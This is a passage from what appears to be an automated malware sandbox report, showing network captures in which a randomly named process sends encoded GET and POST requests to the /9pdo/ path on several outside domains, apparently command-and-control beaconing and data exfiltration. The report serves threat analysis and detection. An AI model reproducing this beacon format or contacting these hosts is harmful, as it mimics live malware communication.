                                                                      Apr 25, 2024 19:26:21.037945986 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037985086 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038000107 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038033009 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038074970 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038080931 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038108110 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038165092 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038245916 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038444996 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038459063 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038475037 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038489103 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.038489103 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.038521051 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.086395025 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.308274984 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.308383942 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:22.477163076 CEST4971280192.168.2.10219.94.128.41

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 25, 2024 19:25:23.872199059 CEST5106453192.168.2.101.1.1.1
                                                                      Apr 25, 2024 19:25:24.372607946 CEST53510641.1.1.1192.168.2.10
                                                                      Apr 25, 2024 19:25:48.691042900 CEST5922053192.168.2.101.1.1.1
                                                                      Apr 25, 2024 19:25:49.456856012 CEST53592201.1.1.1192.168.2.10
                                                                      Apr 25, 2024 19:26:05.105806112 CEST6492453192.168.2.101.1.1.1
                                                                      Apr 25, 2024 19:26:05.330861092 CEST53649241.1.1.1192.168.2.10
                                                                      Apr 25, 2024 19:26:19.247309923 CEST5897753192.168.2.101.1.1.1
                                                                      Apr 25, 2024 19:26:20.097971916 CEST53589771.1.1.1192.168.2.10

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Apr 25, 2024 19:25:23.872199059 CEST192.168.2.101.1.1.10x9a52Standard query (0)kraljevikonaci.rsA (IP address)IN (0x0001)false
                                                                      Apr 25, 2024 19:25:48.691042900 CEST192.168.2.101.1.1.10x3285Standard query (0)www.ejbodyart.comA (IP address)IN (0x0001)false
                                                                      Apr 25, 2024 19:26:05.105806112 CEST192.168.2.101.1.1.10x5394Standard query (0)www.jt-berger.storeA (IP address)IN (0x0001)false
                                                                      Apr 25, 2024 19:26:19.247309923 CEST192.168.2.101.1.1.10x7f27Standard query (0)www.n-benriya002.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Apr 25, 2024 19:25:24.372607946 CEST1.1.1.1192.168.2.100x9a52No error (0)kraljevikonaci.rs195.252.110.253A (IP address)IN (0x0001)false
                                                                      Apr 25, 2024 19:25:49.456856012 CEST1.1.1.1192.168.2.100x3285No error (0)www.ejbodyart.comejbodyart.comCNAME (Canonical name)IN (0x0001)false
                                                                      Apr 25, 2024 19:25:49.456856012 CEST1.1.1.1192.168.2.100x3285No error (0)ejbodyart.com112.175.50.218A (IP address)IN (0x0001)false
                                                                      Apr 25, 2024 19:26:05.330861092 CEST1.1.1.1192.168.2.100x5394No error (0)www.jt-berger.store217.160.0.183A (IP address)IN (0x0001)false
                                                                      Apr 25, 2024 19:26:20.097971916 CEST1.1.1.1192.168.2.100x7f27No error (0)www.n-benriya002.comn-benriya002.comCNAME (Canonical name)IN (0x0001)false
                                                                      Apr 25, 2024 19:26:20.097971916 CEST1.1.1.1192.168.2.100x7f27No error (0)n-benriya002.com219.94.128.41A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • kraljevikonaci.rs
                                                                      • www.ejbodyart.com
                                                                      • www.jt-berger.store
                                                                      • www.n-benriya002.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.1049707112.175.50.218805852C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 25, 2024 19:25:49.748930931 CEST471OUTGET /9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.ejbodyart.com
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Apr 25, 2024 19:25:50.050057888 CEST398INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 25 Apr 2024 17:25:49 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                                      Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
                                                                      Apr 25, 2024 19:25:50.050247908 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.1049708217.160.0.183805852C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 25, 2024 19:26:05.549998999 CEST741OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 195
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 55 30 36 6c 49 56 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 30 4b 77 4c 4c 2f 42 51 72 72 34 4a 69 7a 5a 76 5a 7a 38 49 42 65 41 76 2b 6a 6a 77
                                                                      Data Ascii: U06lIV=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0KwLL/BQrr4JizZvZz8IBeAv+jjw
                                                                      Apr 25, 2024 19:26:05.777693033 CEST558INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:05 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.1049709217.160.0.183805852C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 25, 2024 19:26:08.512161970 CEST765OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 219
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 55 30 36 6c 49 56 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 35 42 6c 33 37 6a 6c 32 32 70 45 6f 37 6b 53 4e 53 79 74 4e 57 55 5a 72 52 61 46 54 41 50 62 43 67 6c 72 2f 4b 6c 41 68 6f 37 58 49 38 70 79 68 73 57 53 64 63 58 70 47 37 48 64 76 6a 66 56 6b 54 78 7a 68 4d 57 47 6c 2b 72 4b 6b 4a 74 70 2b 2f 5a 75 31 6b 6c 36 34 66 77 7a 39 74 53 55 71 7a 49 2b 53 41 46 76 54 68 47 78 67 49 34 6f 61 49 38 4e 5a 38 56 57 43 34 7a 37 57 37 73 44 58 74 59 6e 57 68 6c 66 48 62 73 6c 75 31 30 46 44 76 68 76 72 2b 4a 63 79 43 2f 42 6e 37 37 67 4a 6c 53 34 6f 49 69 64 66 53 70 63 68 77 6c 57 61 33 6b 6b 50 76 5a 2b 4b 54 32 63 36 70 45 53 58 77 61 31 77 56 41 3d 3d
                                                                      Data Ascii: U06lIV=w9/X/ZL56raZ5Bl37jl22pEo7kSNSytNWUZrRaFTAPbCglr/KlAho7XI8pyhsWSdcXpG7HdvjfVkTxzhMWGl+rKkJtp+/Zu1kl64fwz9tSUqzI+SAFvThGxgI4oaI8NZ8VWC4z7W7sDXtYnWhlfHbslu10FDvhvr+JcyC/Bn77gJlS4oIidfSpchwlWa3kkPvZ+KT2c6pESXwa1wVA==
                                                                      Apr 25, 2024 19:26:08.732366085 CEST558INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:08 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.1049710217.160.0.183805852C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 25, 2024 19:26:11.262888908 CEST1778OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1231
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 55 30 36 6c 49 56 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 35 42 6c 33 37 6a 6c 32 32 70 45 6f 37 6b 53 4e 53 79 74 4e 57 55 5a 72 52 61 46 54 41 50 54 43 67 58 6a 2f 4c 47 6f 68 70 37 58 49 78 4a 79 67 73 57 54 59 63 58 68 5a 37 48 42 56 6a 5a 52 6b 54 53 37 68 5a 56 65 6c 30 72 4b 6b 42 4e 70 46 77 35 75 6b 6b 6c 4c 2f 66 77 6a 39 74 53 55 71 7a 50 4f 53 48 55 76 54 6a 47 78 6a 41 59 6f 57 43 63 4e 31 38 57 6d 30 34 7a 50 67 37 63 6a 58 73 34 33 57 6e 58 33 48 42 73 6c 6f 30 30 46 62 76 6b 32 7a 2b 4a 51 51 43 38 64 64 37 34 41 4a 67 55 4a 69 63 41 4e 4c 46 71 74 2b 38 58 32 2f 6b 77 59 6f 31 63 76 4b 46 7a 51 76 31 58 72 36 6c 6f 34 44 48 62 6e 47 57 64 5a 48 74 6b 45 35 76 48 2b 32 49 42 6e 2b 47 39 35 48 62 54 54 78 65 75 50 50 50 36 74 74 78 58 6a 33 55 38 73 48 62 37 63 71 53 41 63 51 4a 6f 4d 4b 34 62 47 77 32 4f 76 32 5a 78 51 2f 75 62 39 2f 6e 6b 59 59 42 7a 64 61 76 64 69 38 75 44 77 4b 61 2f 36 49 57 58 6d 66 63 37 65 33 79 71 41 4c 33 30 34 77 55 6c 6d 54 65 33 75 4c 56 4d 78 57 46 64 56 34 7a 63 65 6e 78 35 49 68 31 45 54 31 2f 2b 76 43 6c 58 74 50 78 7a 36 2f 43 38 47 4f 55 54 70 4e 30 2b 6d 41 67 31 42 69 54 64 63 6e 51 54 4a 54 36 34 64 65 49 4f 77 63 79 78 69 76 52 73 44 67 78 48 75 76 56 55 43 78 79 66 2b 54 61 57 5a 2f 64 73 2f 76 49 79 6d 38 71 4d 7a 73 69 4a 52 36 34 53 79 65 77 4b 42 55 41 6c 62 55 51 61 31 4e 75 6e 53 36 66 56 63 59 55 42 6b 42 37 4d 33 49 2b 31 75 4f 4a 69 58 63 64 31 36 74 37 77 61 51 4e 69 4f 44 52 43 65 4d 68 6f 58 6e 57 77 38 6f 69 31 70 35 53 78 4b 30 4a 4e 78 61 44 65 71 35 53 61 44 32 35 47 45 4a 30 72 47 50 4f 5a 7a 74 31 31 58 48 55 41 47 4a 5a 56 31 69 6c 4b 69 79 4f 4b 4d 70 6a 75 2f 46 31 7a 46 47 37 46 31 61 6b 77 77 65 4b 50 73 32 54 53 53 30 6f 7a 64 39 54 2f 68 33 38 47 4d 4e 65 53 76 70 31 39 62 57 72 39 35 77 31 46 56 30 6e 33 43 64 71 54 56 64 69 76 64 79 61 31 4f 71 68 69 6c 2b 69 77 38 2b 6e 62 4a 48 43 75 76 49 7a 6d 44 6e 77 77 47 69 72 4a 69 47 63 59 59 74 36 53 57 51 6e 70 55 38 7a 75 6e 62 79 71 34 6c 5a 63 4c 52 6a 6c 61 41 38 43 54 6d 63 39 37 39 70 75 6b 49 32 42 62 63 4d 44 71 61 6b 37 65 6a 44 54 4c 70 39 61 65 76 6a 50 4f 54 31 34 51 30 31 32 66 47 64 34 49 42 32 68 47 62 37 70 6d 4b 4d 7a 66 52 6b 6e 47 61 6f 51 4d 39 31 73 45 61 44 47 35 7a 45 4f 43 61 48 51 46 70 42 4a 5a 5a 7a 71 31 55 58 6e 4a 31 77 72 6c 79 71 39 32 66 62 2b 79 51 76 67 31 4f 49 58 57 33 30 58 55 2b 33 49 6c 73 76 4b 42 4d 62 2f 68 6a 57 69 44 2b 39 79 76 52 55 75 46 6f 53 64 6e 6d 63 6b 35 49 52 41 34 59 58 7a 2b 4a 39 33 6c 5a 50 73 78 69 6a 74 4c 48 67 36 49 6f 6f 6a 2b 7a 58 78 76 75 54 6b 47 6c 4d 78 7a 73 78 65 5a 66 71 68 64 79 65 5a 6d 68 74 66 77 4f 70 45 37 39 66 34 50 71 73 78 61 55 48 33 6d 4d 6b 6d 49 59 42 43 62 44 4a 65 2b 66 2b 75 39 48 51 7a 36 51 2f 74 64 44 61 5a 4b 4e 6c 57 63 35 76 75 4d 6a 78 52 32 61 36 4e 51 34 4a 6e 41 38 50 4b 35 6c 7a 79 5a 43 75 4b 34 45 6c 6c 2f 2f 2b 4b 37 6d 78 62 42 7a 4e 75 37 68 50 72 39 4b 6a 35 61 41 50 75 49 42 46 4a 42 49 75 53 31 32 77 44 4c 79 35 62 5a 4b 57 42 6b 53 69 76 32 49 61 46 4a 4f 48 65 66 78 74 63 69 38 67 6f 41 78 61 38 49 66 36 66 61 2f 75 38 65 64 52 59 70 70 59 37 72 73 57 75 69 5a 34 56 67 4d 36 69 54 39 68 73 37 55 50 4f 49 4c 5a 74 51 71 34 6f 4e 53 78 63 4d 75 51 6e 38 56 46 36 2f 77 79 67 2f 6d 56 64 5a 57 32 6a 59 41 6d 6a 78 31 66 78 62 66 6f 70 39 72 68 4b 52 48 37 71 68 45 63 64 6e 73 55 6a 38 69 6b 39 4f 53 71 36 4c 67 75 6b 34 6c 31 4f 78 62 37 39 51 44 65 30 6b 49 32 38 53 6b 53 77 73 44 61 34 6b 79 58 6a 61 36 51 53 35 35 4e 6f 41 75 35 4e 35 6f 44 49 75 66 2b 34 33 42 43 2f 39 32 45 45 75 39 62 6e 63 7a 34 45 74 49 6f 4f 76 61 61 55 64 67 4c 4e 6e 2f 39 41 75 62 59 67 47 44 33 4c 39 6e 6d 41 45 3d
                                                                      Data Ascii: U06lIV=w9/X/ZL56raZ5Bl37jl22pEo7kSNSytNWUZrRaFTAPTCgXj/LGohp7XIxJygsWTYcXhZ7HBVjZRkTS7hZVel0rKkBNpFw5ukklL/fwj9tSUqzPOSHUvTjGxjAYoWCcN18Wm04zPg7cjXs43WnX3HBslo00Fbvk2z+JQQC8dd74AJgUJicANLFqt+8X2/kwYo1cvKFzQv1Xr6lo4DHbnGWdZHtkE5vH+2IBn+G95HbTTxeuPPP6ttxXj3U8sHb7cqSAcQJoMK4bGw2Ov2ZxQ/ub9/nkYYBzdavdi8uDwKa/6IWXmfc7e3yqAL304wUlmTe3uLVMxWFdV4zcenx5Ih1ET1/+vClXtPxz6/C8GOUTpN0+mAg1BiTdcnQTJT64deIOwcyxivRsDgxHuvVUCxyf+TaWZ/ds/vIym8qMzsiJR64SyewKBUAlbUQa1NunS6fVcYUBkB7M3I+1uOJiXcd16t7waQNiODRCeMhoXnWw8oi1p5SxK0JNxaDeq5SaD25GEJ0rGPOZzt11XHUAGJZV1ilKiyOKMpju/F1zFG7F1akwweKPs2TSS0ozd9T/h38GMNeSvp19bWr95w1FV0n3CdqTVdivdya1Oqhil+iw8+nbJHCuvIzmDnwwGirJiGcYYt6SWQnpU8zunbyq4lZcLRjlaA8CTmc979pukI2BbcMDqak7ejDTLp9aevjPOT14Q012fGd4IB2hGb7pmKMzfRknGaoQM91sEaDG5zEOCaHQFpBJZZzq1UXnJ1wrlyq92fb+yQvg1OIXW30XU+3IlsvKBMb/hjWiD+9yvRUuFoSdnmck5IRA4YXz+J93lZPsxijtLHg6Iooj+zXxvuTkGlMxzsxeZfqhdyeZmhtfwOpE79f4PqsxaUH3mMkmIYBCbDJe+f+u9HQz6Q/tdDaZKNlWc5vuMjxR2a6NQ4JnA8PK5lzyZCuK4Ell//+K7mxbBzNu7hPr9Kj5aAPuIBFJBIuS12wDLy5bZKWBkSiv2IaFJOHefxtci8goAxa8If6fa/u8edRYppY7rsWuiZ4VgM6iT9hs7UPOILZtQq4oNSxcMuQn8VF6/wyg/mVdZW2jYAmjx1fxbfop9rhKRH7qhEcdnsUj8ik9OSq6Lguk4l1Oxb79QDe0kI28SkSwsDa4kyXja6QS55NoAu5N5oDIuf+43BC/92EEu9bncz4EtIoOvaaUdgLNn/9AubYgGD3L9nmAE=
                                                                      Apr 25, 2024 19:26:11.491929054 CEST558INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 25 Apr 2024 17:26:11 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.1049711217.160.0.183805852C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 25, 2024 19:26:14.011388063 CEST473OUTGET /9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 HTTP/1.1
